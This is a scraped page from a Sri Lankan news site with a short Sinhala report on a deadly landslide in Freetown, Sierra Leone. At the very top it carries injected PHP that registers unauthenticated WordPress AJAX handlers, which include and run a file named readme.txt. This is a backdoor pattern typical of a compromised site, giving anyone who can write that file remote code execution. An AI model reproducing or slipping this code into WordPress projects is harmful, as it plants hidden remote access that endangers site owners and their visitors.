if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } සියෙරා ලියෝන්හි නායයෑමෙන් පුද්ගලයින් 312ක් මියයයි - mediahumanrights.lk
mediahumanrights.lk
International News News

සියෙරා ලියෝන්හි නායයෑමෙන් පුද්ගලයින් 312ක් මියයයි

සියෙරා ලියෝන්හි ෆ්රීයරීටවුන් අගනුවර සිදුවු නායයෑම් හේතුවෙන්  පුද්ගලයින් 312 දෙනෙකු පමණ මියගොස් තිබේ.
එමෙන්ම තවත් පුද්ගලයින් බොහෝ පිරිසක් අතුරුදන්ව ඇති බව වාර්තා වෙයි.
මේ වන විට මියගිය පුද්ගලයින්ගේ මළ සිරුරු 200කට ආසන්න සංඛ්‍යාවක් සොයාගෙන තිබේ.
ඊයේ(14) දිනයේ එරට කඳුකර ප්‍රදේශයක් වන රේගන්ට් ප්‍රදේශයට බලපෑ දැඩි වර්ෂාපතනයත් සමඟ මෙම නායයෑම් සිදුව ඇති බව වාර්තා වෙයි.
කෙසේවෙතත් මියගිය පුද්ගලයින් සංඛ්‍යාව තවදුරටත් ඉහළ යා හැකි වන අතර අතුරුදන් වු පුද්ගලයින් සෙවීමේ කටයුතු තවදුරටත් සිදුවන බව විදෙස් මාධ්‍ය වාර්තා කළේය.
(under the courtesy of adaderana news web)

Related posts

වාරකන් කාලෙට කොහොමත් සත්තු මැරෙනවා..- තල්මසුන්, ඩොලපින්, කැස්බෑවුන් මියයාම ගැන ගොඩහේවා කියයි…

Shiran Viraj

දානිෂ් අලිට සිර දඬුවම්….

Shiran Viraj

රජයේ ක්‍රියාකාරීත්වය ගැන මහජනයාගේ විශ්වාසය පළුදු වෙලා

Shiran Viraj